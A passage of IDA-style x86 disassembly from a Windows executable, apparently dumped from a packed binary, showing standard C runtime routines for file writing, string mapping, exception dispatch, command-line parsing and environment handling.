cmp eax, [ebp+arg_8]
jb short loc_42317C
loc_4231F2: ; CODE XREF: sub_4230FB+EA�j
; sub_4230FB+12E�j
xor edi, edi
loc_4231F4: ; CODE XREF: sub_4230FB+150�j
; sub_4230FB+15B�j
mov eax, [ebp+var_8]
cmp eax, edi
jnz loc_42328A
cmp [ebp+arg_0], edi
jz short loc_423263
push 5
pop eax
cmp [ebp+arg_0], eax
jnz short loc_423258
mov dword_4DBDDC, 9
mov dword_4DBDE0, eax
jmp loc_4232A0
; ---------------------------------------------------------------------------
loc_423220: ; CODE XREF: sub_4230FB+E0�j
call ds:dword_427094 ; RtlGetLastWin32Error
mov [ebp+arg_0], eax
jmp short loc_4231F2
; ---------------------------------------------------------------------------
loc_42322B: ; CODE XREF: sub_4230FB+69�j
lea ecx, [ebp+var_C]
push edi
push ecx
push [ebp+arg_8]
push [ebp+arg_4]
push dword ptr [eax]
call ds:dword_4270F0 ; WriteFile
test eax, eax
jz short loc_42324D
mov eax, [ebp+var_C]
mov [ebp+arg_0], edi
mov [ebp+var_8], eax
jmp short loc_4231F4
; ---------------------------------------------------------------------------
loc_42324D: ; CODE XREF: sub_4230FB+145�j
call ds:dword_427094 ; RtlGetLastWin32Error
mov [ebp+arg_0], eax
jmp short loc_4231F4
; ---------------------------------------------------------------------------
loc_423258: ; CODE XREF: sub_4230FB+10F�j
push [ebp+arg_0]
call sub_420C7F
pop ecx
jmp short loc_4232A0
; ---------------------------------------------------------------------------
loc_423263: ; CODE XREF: sub_4230FB+7B�j
; sub_4230FB+107�j
mov eax, [ebx]
test byte ptr [eax+esi+4], 40h
jz short loc_423278
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 1Ah
jz loc_423145
loc_423278: ; CODE XREF: sub_4230FB+16F�j
mov dword_4DBDDC, 1Ch
mov dword_4DBDE0, edi
jmp short loc_4232A0
; ---------------------------------------------------------------------------
loc_42328A: ; CODE XREF: sub_4230FB+FE�j
sub eax, [ebp+var_10]
jmp short loc_4232A3
; ---------------------------------------------------------------------------
loc_42328F: ; CODE XREF: sub_4230FB+15�j
; sub_4230FB+37�j
and dword_4DBDE0, 0
mov dword_4DBDDC, 9
loc_4232A0: ; CODE XREF: sub_4230FB+120�j
; sub_4230FB+166�j ...
or eax, 0FFFFFFFFh
loc_4232A3: ; CODE XREF: sub_4230FB+4C�j
; sub_4230FB+192�j
pop edi
pop esi
pop ebx
leave
retn
sub_4230FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4232A8 proc near ; CODE XREF: sub_41DE4A+47�p
; sub_41DE4A+74�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_427928
push offset sub_423CC0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor edi, edi
cmp dword_4DBE78, edi
jnz short loc_42331E
push edi
push edi
push 1
pop ebx
push ebx
push offset dword_427920
mov esi, 100h
push esi
push edi
call ds:dword_427044 ; LCMapStringW
test eax, eax
jz short loc_4232FC
mov dword_4DBE78, ebx
jmp short loc_42331E
; ---------------------------------------------------------------------------
loc_4232FC: ; CODE XREF: sub_4232A8+4A�j
push edi
push edi
push ebx
push offset word_4CB88C
push esi
push edi
call ds:dword_427048 ; LCMapStringA
test eax, eax
jz loc_423436
mov dword_4DBE78, 2
loc_42331E: ; CODE XREF: sub_4232A8+2E�j
; sub_4232A8+52�j
cmp [ebp+arg_C], edi
jle short loc_423333
push [ebp+arg_C]
push [ebp+arg_8]
call sub_4234CC
pop ecx
pop ecx
mov [ebp+arg_C], eax
loc_423333: ; CODE XREF: sub_4232A8+79�j
mov eax, dword_4DBE78
cmp eax, 2
jnz short loc_42335A
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_427048 ; LCMapStringA
jmp loc_423438
; ---------------------------------------------------------------------------
loc_42335A: ; CODE XREF: sub_4232A8+93�j
cmp eax, 1
jnz loc_423436
cmp [ebp+arg_18], edi
jnz short loc_423370
mov eax, dword_4DBE94
mov [ebp+arg_18], eax
loc_423370: ; CODE XREF: sub_4232A8+BE�j
push edi
push edi
push [ebp+arg_C]
push [ebp+arg_8]
mov eax, [ebp+arg_1C]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_18]
call ds:dword_4270E8 ; MultiByteToWideChar
mov ebx, eax
mov [ebp+var_1C], ebx
cmp ebx, edi
jz loc_423436
mov [ebp+var_4], edi
lea eax, [ebx+ebx]
add eax, 3
and al, 0FCh
call sub_41C500
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4233CB
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
mov [ebp+var_24], edi
or [ebp+var_4], 0FFFFFFFFh
mov ebx, [ebp+var_1C]
loc_4233CB: ; CODE XREF: sub_4232A8+10E�j
cmp [ebp+var_24], edi
jz short loc_423436
push ebx
push [ebp+var_24]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call ds:dword_4270E8 ; MultiByteToWideChar
test eax, eax
jz short loc_423436
push edi
push edi
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_427044 ; LCMapStringW
mov esi, eax
mov [ebp+var_28], esi
cmp esi, edi
jz short loc_423436
test byte ptr [ebp+arg_4+1], 4
jz short loc_42344A
cmp [ebp+arg_14], edi
jz loc_4234C5
cmp esi, [ebp+arg_14]
jg short loc_423436
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_427044 ; LCMapStringW
test eax, eax
jnz loc_4234C5
loc_423436: ; CODE XREF: sub_4232A8+66�j
; sub_4232A8+B5�j ...
xor eax, eax
loc_423438: ; CODE XREF: sub_4232A8+AD�j
; sub_4232A8+21F�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_42344A: ; CODE XREF: sub_4232A8+160�j
mov [ebp+var_4], 1
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_41C500
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_20], ebx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_42347E
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
xor ebx, ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_28]
loc_42347E: ; CODE XREF: sub_4232A8+1C2�j
cmp ebx, edi
jz short loc_423436
push esi
push ebx
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_427044 ; LCMapStringW
test eax, eax
jz short loc_423436
cmp [ebp+arg_14], edi
push edi
push edi
jnz short loc_4234A5
push edi
push edi
jmp short loc_4234AB
; ---------------------------------------------------------------------------
loc_4234A5: ; CODE XREF: sub_4232A8+1F7�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_4234AB: ; CODE XREF: sub_4232A8+1FB�j
push esi
push ebx
push 220h
push [ebp+arg_18]
call ds:dword_427188 ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz loc_423436
loc_4234C5: ; CODE XREF: sub_4232A8+165�j
; sub_4232A8+188�j
mov eax, esi
jmp loc_423438
sub_4232A8 endp
; =============== S U B R O U T I N E =======================================
sub_4234CC proc near ; CODE XREF: sub_4232A8+81�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_4234E9
loc_4234DC: ; CODE XREF: sub_4234CC+1B�j
cmp byte ptr [eax], 0
jz short loc_4234E9
inc eax
mov esi, ecx
dec ecx
test esi, esi
jnz short loc_4234DC
loc_4234E9: ; CODE XREF: sub_4234CC+E�j
; sub_4234CC+13�j
cmp byte ptr [eax], 0
pop esi
jnz short loc_4234F4
sub eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_4234F4: ; CODE XREF: sub_4234CC+21�j
mov eax, edx
retn
sub_4234CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4234F7 proc near ; CODE XREF: .text:0041E2B6�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push [ebp+arg_0]
call sub_423638
test eax, eax
pop ecx
jz loc_42362C
mov ebx, [eax+8]
test ebx, ebx
jz loc_42362C
cmp ebx, 5
jnz short loc_423528
and dword ptr [eax+8], 0
push 1
pop eax
jmp loc_423635
; ---------------------------------------------------------------------------
loc_423528: ; CODE XREF: sub_4234F7+23�j
cmp ebx, 1
jz loc_423627
mov ecx, dword_4DBE9C
mov [ebp+arg_0], ecx
mov ecx, [ebp+arg_4]
mov dword_4DBE9C, ecx
mov ecx, [eax+4]
cmp ecx, 8
jnz loc_423617
mov ecx, dword_43D4C0
mov edx, dword_43D4C4
add edx, ecx
push esi
cmp ecx, edx
jge short loc_423577
lea esi, [ecx+ecx*2]
sub edx, ecx
lea esi, ds:43D450h[esi*4]
loc_42356E: ; CODE XREF: sub_4234F7+7E�j
and dword ptr [esi], 0
add esi, 0Ch
dec edx
jnz short loc_42356E
loc_423577: ; CODE XREF: sub_4234F7+69�j
mov eax, [eax]
mov esi, dword_43D4CC
cmp eax, 0C000008Eh
jnz short loc_423592
mov dword_43D4CC, 83h
jmp short loc_423602
; ---------------------------------------------------------------------------
loc_423592: ; CODE XREF: sub_4234F7+8D�j
cmp eax, 0C0000090h
jnz short loc_4235A5
mov dword_43D4CC, 81h
jmp short loc_423602
; ---------------------------------------------------------------------------
loc_4235A5: ; CODE XREF: sub_4234F7+A0�j
cmp eax, 0C0000091h
jnz short loc_4235B8
mov dword_43D4CC, 84h
jmp short loc_423602
; ---------------------------------------------------------------------------
loc_4235B8: ; CODE XREF: sub_4234F7+B3�j
cmp eax, 0C0000093h
jnz short loc_4235CB
mov dword_43D4CC, 85h
jmp short loc_423602
; ---------------------------------------------------------------------------
loc_4235CB: ; CODE XREF: sub_4234F7+C6�j
cmp eax, 0C000008Dh
jnz short loc_4235DE
mov dword_43D4CC, 82h
jmp short loc_423602
; ---------------------------------------------------------------------------
loc_4235DE: ; CODE XREF: sub_4234F7+D9�j
cmp eax, 0C000008Fh
jnz short loc_4235F1
mov dword_43D4CC, 86h
jmp short loc_423602
; ---------------------------------------------------------------------------
loc_4235F1: ; CODE XREF: sub_4234F7+EC�j
cmp eax, 0C0000092h
jnz short loc_423602
mov dword_43D4CC, 8Ah
loc_423602: ; CODE XREF: sub_4234F7+99�j
; sub_4234F7+AC�j ...
push dword_43D4CC
push 8
call ebx
pop ecx
mov dword_43D4CC, esi
pop ecx
pop esi
jmp short loc_42361F
; ---------------------------------------------------------------------------
loc_423617: ; CODE XREF: sub_4234F7+52�j
and dword ptr [eax+8], 0
push ecx
call ebx
pop ecx
loc_42361F: ; CODE XREF: sub_4234F7+11E�j
mov eax, [ebp+arg_0]
mov dword_4DBE9C, eax
loc_423627: ; CODE XREF: sub_4234F7+34�j
or eax, 0FFFFFFFFh
jmp short loc_423635
; ---------------------------------------------------------------------------
loc_42362C: ; CODE XREF: sub_4234F7+F�j
; sub_4234F7+1A�j
push [ebp+arg_4]
call ds:dword_427040 ; UnhandledExceptionFilter
loc_423635: ; CODE XREF: sub_4234F7+2C�j
; sub_4234F7+133�j
pop ebx
pop ebp
retn
sub_4234F7 endp
; =============== S U B R O U T I N E =======================================
sub_423638 proc near ; CODE XREF: sub_4234F7+7�p
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov ecx, dword_43D4C8
cmp dword_43D448, edx
push esi
mov eax, offset dword_43D448
jz short loc_423665
lea esi, [ecx+ecx*2]
lea esi, ds:43D448h[esi*4]
loc_42365A: ; CODE XREF: sub_423638+2B�j
add eax, 0Ch
cmp eax, esi
jnb short loc_423665
cmp [eax], edx
jnz short loc_42365A
loc_423665: ; CODE XREF: sub_423638+16�j
; sub_423638+27�j
lea ecx, [ecx+ecx*2]
pop esi
lea ecx, ds:43D448h[ecx*4]
cmp eax, ecx
jnb short loc_423678
cmp [eax], edx
jz short locret_42367A
loc_423678: ; CODE XREF: sub_423638+3A�j
xor eax, eax
locret_42367A: ; CODE XREF: sub_423638+3E�j
retn
sub_423638 endp
; =============== S U B R O U T I N E =======================================
sub_42367B proc near ; CODE XREF: .text:0041E278�p
cmp dword_4DD394, 0
jnz short loc_423689
call sub_420B0D
loc_423689: ; CODE XREF: sub_42367B+7�j
push esi
mov esi, dword_4DD38C
mov al, [esi]
cmp al, 22h
jnz short loc_4236BB
loc_423696: ; CODE XREF: sub_42367B+33�j
; sub_42367B+36�j
mov al, [esi+1]
inc esi
cmp al, 22h
jz short loc_4236B3
test al, al
jz short loc_4236B3
movzx eax, al
push eax
call sub_424FE7
test eax, eax
pop ecx
jz short loc_423696
inc esi
jmp short loc_423696
; ---------------------------------------------------------------------------
loc_4236B3: ; CODE XREF: sub_42367B+21�j
; sub_42367B+25�j
cmp byte ptr [esi], 22h
jnz short loc_4236C5
loc_4236B8: ; CODE XREF: sub_42367B+52�j
inc esi
jmp short loc_4236C5
; ---------------------------------------------------------------------------
loc_4236BB: ; CODE XREF: sub_42367B+19�j
cmp al, 20h
jbe short loc_4236C5
loc_4236BF: ; CODE XREF: sub_42367B+48�j
inc esi
cmp byte ptr [esi], 20h
ja short loc_4236BF
loc_4236C5: ; CODE XREF: sub_42367B+3B�j
; sub_42367B+3E�j ...
mov al, [esi]
test al, al
jz short loc_4236CF
cmp al, 20h
jbe short loc_4236B8
loc_4236CF: ; CODE XREF: sub_42367B+4E�j
mov eax, esi
pop esi
retn
sub_42367B endp
; =============== S U B R O U T I N E =======================================
sub_4236D3 proc near ; CODE XREF: .text:0041E261�p
push ebx
xor ebx, ebx
cmp dword_4DD394, ebx
push esi
push edi
jnz short loc_4236E5
call sub_420B0D
loc_4236E5: ; CODE XREF: sub_4236D3+B�j
mov esi, dword_4DBE34
xor edi, edi
loc_4236ED: ; CODE XREF: sub_4236D3+30�j
mov al, [esi]
cmp al, bl
jz short loc_423705
cmp al, 3Dh
jz short loc_4236F8
inc edi
loc_4236F8: ; CODE XREF: sub_4236D3+22�j
push esi
call sub_41B9C0
pop ecx
lea esi, [esi+eax+1]
jmp short loc_4236ED
; ---------------------------------------------------------------------------
loc_423705: ; CODE XREF: sub_4236D3+1E�j
lea eax, ds:4[edi*4]
push eax
call sub_41BEB5
mov esi, eax
pop ecx
cmp esi, ebx
mov dword_4DBE04, esi
jnz short loc_423727
push 9
call sub_41E2C9
pop ecx
loc_423727: ; CODE XREF: sub_4236D3+4A�j
mov edi, dword_4DBE34
cmp [edi], bl
jz short loc_42376A
push ebp
loc_423732: ; CODE XREF: sub_4236D3+94�j
push edi
call sub_41B9C0
mov ebp, eax
pop ecx
inc ebp
cmp byte ptr [edi], 3Dh
jz short loc_423763
push ebp
call sub_41BEB5
cmp eax, ebx
pop ecx
mov [esi], eax
jnz short loc_423756
push 9
call sub_41E2C9
pop ecx
loc_423756: ; CODE XREF: sub_4236D3+79�j
push edi
push dword ptr [esi]
call sub_41C890
pop ecx
add esi, 4
pop ecx
loc_423763: ; CODE XREF: sub_4236D3+6C�j
add edi, ebp
cmp [edi], bl
jnz short loc_423732
pop ebp
loc_42376A: ; CODE XREF: sub_4236D3+5C�j
push dword_4DBE34
call sub_41BA91
pop ecx
mov dword_4DBE34, ebx
mov [esi], ebx
pop edi
pop esi
mov dword_4DD390, 1
pop ebx
retn
sub_4236D3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42378C proc near ; CODE XREF: .text:0041E25C�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp dword_4DD394, ebx
push esi
push edi
jnz short loc_4237A3
call sub_420B0D
loc_4237A3: ; CODE XREF: sub_42378C+10�j
mov esi, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push 104h
push esi
push ebx
call ds:dword_427078 ; GetModuleFileNameA
mov eax, dword_4DD38C
mov off_4DBE14, esi
mov edi, esi
cmp [eax], bl
jz short loc_4237C8
mov edi, eax
loc_4237C8: ; CODE XREF: sub_42378C+38�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push ebx
push ebx
push edi
call sub_423825
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
lea eax, [eax+ecx*4]
push eax
call sub_41BEB5
mov esi, eax
add esp, 18h
cmp esi, ebx
jnz short loc_4237F8
push 8
call sub_41E2C9
pop ecx
loc_4237F8: ; CODE XREF: sub_42378C+62�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_4]
lea eax, [esi+eax*4]
push eax
push esi
push edi
call sub_423825
mov eax, [ebp+var_4]
add esp, 14h
dec eax
mov dword_4DBDFC, esi
pop edi
pop esi
mov dword_4DBDF8, eax
pop ebx
leave
retn
sub_42378C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423825 proc near ; CODE XREF: sub_42378C+47�p
; sub_42378C+7D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_10]
mov eax, [ebp+arg_C]
push ebx
push esi
and dword ptr [ecx], 0
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov dword ptr [eax], 1
mov eax, [ebp+arg_0]
test edi, edi
jz short loc_42384F
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_42384F: ; CODE XREF: sub_423825+20�j
cmp byte ptr [eax], 22h
jnz short loc_423898
loc_423854: ; CODE XREF: sub_423825+58�j
; sub_423825+5F�j
mov dl, [eax+1]
inc eax
cmp dl, 22h
jz short loc_423886
test dl, dl
jz short loc_423886
movzx edx, dl
test byte_4DD261[edx], 4
jz short loc_423879
inc dword ptr [ecx]
test esi, esi
jz short loc_423879
mov dl, [eax]
mov [esi], dl
inc esi
inc eax
loc_423879: ; CODE XREF: sub_423825+46�j
; sub_423825+4C�j
inc dword ptr [ecx]
test esi, esi
jz short loc_423854
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_423854
; ---------------------------------------------------------------------------
loc_423886: ; CODE XREF: sub_423825+36�j
; sub_423825+3A�j
inc dword ptr [ecx]
test esi, esi
jz short loc_423890
and byte ptr [esi], 0
inc esi
loc_423890: ; CODE XREF: sub_423825+65�j
cmp byte ptr [eax], 22h
jnz short loc_4238DB
inc eax
jmp short loc_4238DB
; ---------------------------------------------------------------------------
loc_423898: ; CODE XREF: sub_423825+2D�j
; sub_423825+A5�j
inc dword ptr [ecx]
test esi, esi
jz short loc_4238A3
mov dl, [eax]
mov [esi], dl
inc esi
loc_4238A3: ; CODE XREF: sub_423825+77�j
mov dl, [eax]
inc eax
movzx ebx, dl
test byte_4DD261[ebx], 4
jz short loc_4238BE
inc dword ptr [ecx]
test esi, esi
jz short loc_4238BD
mov bl, [eax]
mov [esi], bl
inc esi
loc_4238BD: ; CODE XREF: sub_423825+91�j
inc eax
loc_4238BE: ; CODE XREF: sub_423825+8B�j
cmp dl, 20h
jz short loc_4238CC
test dl, dl
jz short loc_4238D0
cmp dl, 9
jnz short loc_423898
loc_4238CC: ; CODE XREF: sub_423825+9C�j
test dl, dl
jnz short loc_4238D3
loc_4238D0: ; CODE XREF: sub_423825+A0�j
dec eax
jmp short loc_4238DB
; ---------------------------------------------------------------------------
loc_4238D3: ; CODE XREF: sub_423825+A9�j
test esi, esi
jz short loc_4238DB
and byte ptr [esi-1], 0
loc_4238DB: ; CODE XREF: sub_423825+6E�j
; sub_423825+71�j ...
and [ebp+arg_10], 0
loc_4238DF: ; CODE XREF: sub_423825+19E�j
cmp byte ptr [eax], 0
jz loc_4239C8
loc_4238E8: ; CODE XREF: sub_423825+D0�j
mov dl, [eax]
cmp dl, 20h
jz short loc_4238F4
cmp dl, 9
jnz short loc_4238F7
loc_4238F4: ; CODE XREF: sub_423825+C8�j
inc eax
jmp short loc_4238E8
; ---------------------------------------------------------------------------
loc_4238F7: ; CODE XREF: sub_423825+CD�j
cmp byte ptr [eax], 0
jz loc_4239C8
test edi, edi
jz short loc_42390C
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_42390C: ; CODE XREF: sub_423825+DD�j
mov edx, [ebp+arg_C]
inc dword ptr [edx]
loc_423911: ; CODE XREF: sub_423825+18F�j
mov [ebp+arg_0], 1
xor ebx, ebx
loc_42391A: ; CODE XREF: sub_423825+FC�j
cmp byte ptr [eax], 5Ch
jnz short loc_423923
inc eax
inc ebx
jmp short loc_42391A
; ---------------------------------------------------------------------------
loc_423923: ; CODE XREF: sub_423825+F8�j
cmp byte ptr [eax], 22h
jnz short loc_423954
test bl, 1
jnz short loc_423952
xor edi, edi
cmp [ebp+arg_10], edi
jz short loc_423941
cmp byte ptr [eax+1], 22h
lea edx, [eax+1]
jnz short loc_423941
mov eax, edx
jmp short loc_423944
; ---------------------------------------------------------------------------
loc_423941: ; CODE XREF: sub_423825+10D�j
; sub_423825+116�j
mov [ebp+arg_0], edi
loc_423944: ; CODE XREF: sub_423825+11A�j
mov edi, [ebp+arg_4]
xor edx, edx
cmp [ebp+arg_10], edx
setz dl
mov [ebp+arg_10], edx
loc_423952: ; CODE XREF: sub_423825+106�j
shr ebx, 1
loc_423954: ; CODE XREF: sub_423825+101�j
mov edx, ebx
dec ebx
test edx, edx
jz short loc_423969
inc ebx
loc_42395C: ; CODE XREF: sub_423825+142�j
test esi, esi
jz short loc_423964
mov byte ptr [esi], 5Ch
inc esi
loc_423964: ; CODE XREF: sub_423825+139�j
inc dword ptr [ecx]
dec ebx
jnz short loc_42395C
loc_423969: ; CODE XREF: sub_423825+134�j
mov dl, [eax]
test dl, dl
jz short loc_4239B9
cmp [ebp+arg_10], 0
jnz short loc_42397F
cmp dl, 20h
jz short loc_4239B9
cmp dl, 9
jz short loc_4239B9
loc_42397F: ; CODE XREF: sub_423825+14E�j
cmp [ebp+arg_0], 0
jz short loc_4239B3
test esi, esi
jz short loc_4239A2
movzx ebx, dl
test byte_4DD261[ebx], 4
jz short loc_42399B
mov [esi], dl
inc esi
inc eax
inc dword ptr [ecx]
loc_42399B: ; CODE XREF: sub_423825+16E�j
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_4239B1
; ---------------------------------------------------------------------------
loc_4239A2: ; CODE XREF: sub_423825+162�j
movzx edx, dl
test byte_4DD261[edx], 4
jz short loc_4239B1
inc eax
inc dword ptr [ecx]
loc_4239B1: ; CODE XREF: sub_423825+17B�j
; sub_423825+187�j
inc dword ptr [ecx]
loc_4239B3: ; CODE XREF: sub_423825+15E�j
inc eax
jmp loc_423911
; ---------------------------------------------------------------------------
loc_4239B9: ; CODE XREF: sub_423825+148�j
; sub_423825+153�j ...
test esi, esi
jz short loc_4239C1
and byte ptr [esi], 0
inc esi
loc_4239C1: ; CODE XREF: sub_423825+196�j
inc dword ptr [ecx]
jmp loc_4238DF
; ---------------------------------------------------------------------------
loc_4239C8: ; CODE XREF: sub_423825+BD�j
; sub_423825+D5�j
test edi, edi
jz short loc_4239CF
and dword ptr [edi], 0
loc_4239CF: ; CODE XREF: sub_423825+1A5�j
mov eax, [ebp+arg_C]
pop edi
pop esi
pop ebx
inc dword ptr [eax]
pop ebp
retn
sub_423825 endp
; =============== S U B R O U T I N E =======================================
sub_4239D9 proc near ; CODE XREF: .text:0041E252�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
mov eax, dword_4DBFA4
push ebx
push ebp
mov ebp, ds:dword_427030
push esi
push edi
xor ebx, ebx
xor esi, esi
xor edi, edi
cmp eax, ebx
jnz short loc_423A27
call ebp ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_423A08
mov dword_4DBFA4, 1
jmp short loc_423A30
; ---------------------------------------------------------------------------
loc_423A08: ; CODE XREF: sub_4239D9+21�j
call ds:dword_427034 ; GetEnvironmentStrings
mov edi, eax
cmp edi, ebx
jz loc_423B02
mov dword_4DBFA4, 2
jmp loc_423AB6
; ---------------------------------------------------------------------------
loc_423A27: ; CODE XREF: sub_4239D9+19�j
cmp eax, 1
jnz loc_423AB1
loc_423A30: ; CODE XREF: sub_4239D9+2D�j
cmp esi, ebx
jnz short loc_423A40
call ebp ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz loc_423B02
loc_423A40: ; CODE XREF: sub_4239D9+59�j
cmp [esi], bx
mov eax, esi
jz short loc_423A55
loc_423A47: ; CODE XREF: sub_4239D9+73�j
; sub_4239D9+7A�j
inc eax
inc eax
cmp [eax], bx
jnz short loc_423A47
inc eax
inc eax
cmp [eax], bx
jnz short loc_423A47
loc_423A55: ; CODE XREF: sub_4239D9+6C�j
sub eax, esi
mov edi, ds:dword_427188
sar eax, 1
push ebx
push ebx
inc eax
push ebx
push ebx
push eax
push esi
push ebx
push ebx
mov [esp+38h+var_4], eax
call edi ; WideCharToMultiByte
mov ebp, eax
cmp ebp, ebx
jz short loc_423AA6
push ebp
call sub_41BEB5
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_423AA6
push ebx
push ebx
push ebp
push eax
push [esp+28h+var_4]
push esi
push ebx
push ebx
call edi ; WideCharToMultiByte
test eax, eax
jnz short loc_423AA2
push [esp+18h+var_8]
call sub_41BA91
pop ecx
mov [esp+18h+var_8], ebx
loc_423AA2: ; CODE XREF: sub_4239D9+B9�j
mov ebx, [esp+18h+var_8]
loc_423AA6: ; CODE XREF: sub_4239D9+99�j
; sub_4239D9+A8�j
push esi
call ds:dword_427038 ; FreeEnvironmentStringsW
mov eax, ebx
jmp short loc_423B04
; ---------------------------------------------------------------------------
loc_423AB1: ; CODE XREF: sub_4239D9+51�j
cmp eax, 2
jnz short loc_423B02
loc_423AB6: ; CODE XREF: sub_4239D9+49�j
cmp edi, ebx
jnz short loc_423AC6
call ds:dword_427034 ; GetEnvironmentStrings
mov edi, eax
cmp edi, ebx
jz short loc_423B02
loc_423AC6: ; CODE XREF: sub_4239D9+DF�j
cmp [edi], bl
mov eax, edi
jz short loc_423AD6
loc_423ACC: ; CODE XREF: sub_4239D9+F6�j
; sub_4239D9+FB�j
inc eax
cmp [eax], bl
jnz short loc_423ACC
inc eax
cmp [eax], bl
jnz short loc_423ACC
loc_423AD6: ; CODE XREF: sub_4239D9+F1�j
sub eax, edi
inc eax
mov ebp, eax
push ebp
call sub_41BEB5
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_423AEC
xor esi, esi
jmp short loc_423AF7
; ---------------------------------------------------------------------------
loc_423AEC: ; CODE XREF: sub_4239D9+10D�j
push ebp
push edi
push esi
call sub_41CD20
add esp, 0Ch
loc_423AF7: ; CODE XREF: sub_4239D9+111�j
push edi
call ds:dword_42703C ; FreeEnvironmentStringsA
mov eax, esi
jmp short loc_423B04
; ---------------------------------------------------------------------------
loc_423B02: ; CODE XREF: sub_4239D9+39�j
; sub_4239D9+61�j ...
xor eax, eax
loc_423B04: ; CODE XREF: sub_4239D9+D6�j
; sub_4239D9+127�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_4239D9 endp
; =============== S U B R O U T I N E =======================================
sub_423B0B proc near ; CODE XREF: .text:0041E242�p
var_44 = byte ptr -44h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
sub esp, 44h
push ebx
push ebp
push esi
push edi
push 100h
call sub_41BEB5
mov esi, eax
pop ecx
test esi, esi
jnz short loc_423B2B
push 1Bh
call sub_41E2C9
pop ecx
loc_423B2B: ; CODE XREF: sub_423B0B+16�j
mov dword_4DD040, esi
mov dword_4DD140, 20h
lea eax, [esi+100h]
loc_423B41: ; CODE XREF: sub_423B0B+52�j
cmp esi, eax
jnb short loc_423B5F
and byte ptr [esi+4], 0
or dword ptr [esi], 0FFFFFFFFh
mov byte ptr [esi+5], 0Ah
mov eax, dword_4DD040
add esi, 8
add eax, 100h
jmp short loc_423B41
; ---------------------------------------------------------------------------
loc_423B5F: ; CODE XREF: sub_423B0B+38�j
lea eax, [esp+54h+var_44]
push eax
call ds:dword_4271A8 ; GetStartupInfoA
cmp word ptr [esp+54h+var_14+2], 0
jz loc_423C3B
mov eax, [esp+54h+var_10]
test eax, eax
jz loc_423C3B
mov esi, [eax]
lea ebp, [eax+4]
mov eax, 800h
cmp esi, eax
lea ebx, [esi+ebp]
jl short loc_423B95
mov esi, eax
loc_423B95: ; CODE XREF: sub_423B0B+86�j
cmp dword_4DD140, esi
jge short loc_423BEF
mov edi, offset dword_4DD044
loc_423BA2: ; CODE XREF: sub_423B0B+DA�j
push 100h
call sub_41BEB5
test eax, eax
pop ecx
jz short loc_423BE9
